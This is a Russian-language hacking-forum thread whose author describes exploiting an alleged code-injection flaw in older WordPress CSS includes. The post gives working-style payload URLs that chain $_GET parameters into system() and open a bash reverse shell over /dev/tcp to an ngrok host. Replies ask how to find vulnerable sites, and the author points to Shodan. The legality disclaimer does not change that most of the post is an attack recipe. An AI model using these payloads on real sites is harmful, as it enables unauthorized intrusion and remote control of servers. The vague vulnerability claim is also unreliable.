Загрузка...

The story of how I completely hacked wordpress sites..

Thread in Web vulnerabilities created by stdout Jul 22, 2021. (bumped Aug 6, 2024) 4601 view

  1. stdout
    stdout Topic starter Jul 22, 2021
    ВНИМАНИЕ! ВСЁ ЧТО ПОКАЗАНО В ЭТОЙ СТАТЬЕ НЕ ДОЛЖНО БЫТЬ ИСПОЛЬЗОВАНО В НЕЗАКОННОЙ ДЕЯТЕЛЬНОСТИ. СТАТЬЯ НАПИСАНА ЛИШЬ ДЛЯ ЗАЩИТЫ ВАШИХ СЕРВИСОВ И ПОКАЗАТЕЛЬНОМУ РАЗМЫШЛЕНИЮ!

    Ав
    тор не призывает совершать какие либо противоправные действия. 272 УК РФ - наказывается сроком до 7ми лет лишения свободы.
    Сайт моего друга, про который я говорю уже исправил уязвимость по моей просьбе. Оставлю его в анонимности

    В старых(Важно, что в старых., ибо есть недалёкие люди, который репортят мои идеи на h1) по странному устроены импорты CSS файлов. Как я понял, там есть что-то подобное
    ⁡include("wp-includes/css/" . $pwd);

    Но нам это только на руку...​
    Очень интересная строчка, даже хочется кое что попробовать
    Попробую что-то вроде
    ⁡ example.com/wp-includes/css/'.print(2+2).'.css


    [IMG]
    УСПЕХ!

    И так, php код мы умеем встраивать, но что же дальше?
    А дальше - больше..​
    После изучения возможностей PHP я пришел к выводу, что там можно выполнять команды в bash
    [IMG]
    Мы всё ближе к цели - доступ в консоли. Но что делать с полученной информацией? TCP Shell - вот на что я намекаю. Но вот не задача, любой символ на подобие пробела и ковычки сломает нам весь payload.

    Составленный нами payload выглядит так
    ⁡example.com/wp-includes/css/'.$_GET[a]($_GET[b].$_GET[c]).'.css?a=system&b=whoami

    Как понятно из кода, мы можем в параметрах a, b, c мы можем передавать код, который будет скрепляться в один

    Теперь дело для тяжялой артилерии
    Запускаем nc
    [IMG]
    запускаем ngrok с помощью которого мы опубликуем наш айпи в интернете
    [IMG]
    и подготавливаем payload
    ⁡ example.com/wp-includes/css/'.$_GET[a]($_GET[b].$_GET[c]).'.css?a=system&b=sudo bash -i >& /dev/tcp/0.tcp.ngrok.io/14502 0>&1

    с помощью декодера переделываем всё в url encode и [IMG]
    [IMG]
    Cпасибо огромное за прочтения, это моя первая длинная статья, которую написал сам. Выражаю благодарность тэгу CODE который шакалил статью, поэтому сегодня без него..


     
  2. remorda
    remorda Jul 22, 2021 Banned 516 Jul 21, 2019
    Нихуя не понял, но вроде годно:cool_bun:
     
  3. Кефтеме
    Кефтеме Jul 22, 2021 1098 Jul 20, 2020
    А %27 и %20 не сработают?
     
    1. stdout Topic starter
      Кефтеме, неа, в этом и загвостка. Было сложно сделать следующий payload
    2. DisgustingMe
      Кефтеме, плагины wp не читают код ASCII, про который ты говоришь. И как написал автор, используя кодирование символов через аски encode, скрипт полезной нагрузки написать достаточно сложно и долго.
  4. CoderVir
    Любой wp сайт можно ёбнуть типо?
     
    1. stdout Topic starter
      @CoderVir, придется проверить уязвим он или нет
  5. RocketDude
    1. View previous comments (1)
    2. RocketDude
      stdout, старый добрый ддос решит все проблемы
    3. stdout Topic starter
      RocketDude, добро пожаловать на:bottle:
    4. RocketDude
      stdout, будто использование уязвимостей не бутылка)
  6. qdsTM
    qdsTM Oct 27, 2021 10 Jun 19, 2021
    Есть вариант по поиску таких сайтов?
     
    1. stdout Topic starter
      qdsTM, через shodan посмотри
  7. Raskolnikov
    На каких версия вп работает и есть ли публичное упоминание этой баги?
     
  8. Falcon_Extra
    Falcon_Extra Jan 9, 2024 Banned 108 Oct 22, 2023
    кто-то уже взломал Meta и теперь у них сервера легли на 10ч
     
Loading...
Top